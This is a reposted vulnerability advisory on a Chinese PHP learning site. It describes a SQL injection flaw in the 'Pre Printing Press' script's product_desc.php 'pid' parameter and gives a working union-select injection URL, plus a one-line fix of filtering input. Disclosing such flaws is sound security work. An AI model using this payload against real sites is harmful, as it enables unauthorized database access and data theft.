来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 标题: Pre Printing Press product_desc.php (pid) SQL Injection Vulnerability作者: Easy Laster基本: Pre Printing Press售价: $999脚本编写: PHP状态: vulnerable|致谢: secunet.to ,4004......
|
标题: Pre Printing Press product_desc.php (pid) SQL Injection Vulnerability
作者: Easy Laster 基本: Pre Printing Press 售价: $999 脚本编写: PHP 状态: vulnerable |致谢: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah 证明 [+] 概述 A complete printing press website script contains all features required for online printing business. Developed in PHP, MYSQL and Flash AS3, with all browsers compatibility and easy to navigate. Package contains builtin designers to customize designs online, shopping cart and complete users and orders modules.Product is user friedly and can fully operate via secure admin panel.Script is fully customizable and ready to upload to start your printing press now. [+] 缺陷 http://[host]/[path]/prestudio/product_desc.php?pid=[vul] [+] Injectable http:// [ www.2cto.com ]/[path]/prestudio/product_desc.php?pid=1 +union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1--+&cid=&sid= [+] 修复 过滤相应页面的参数输入 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
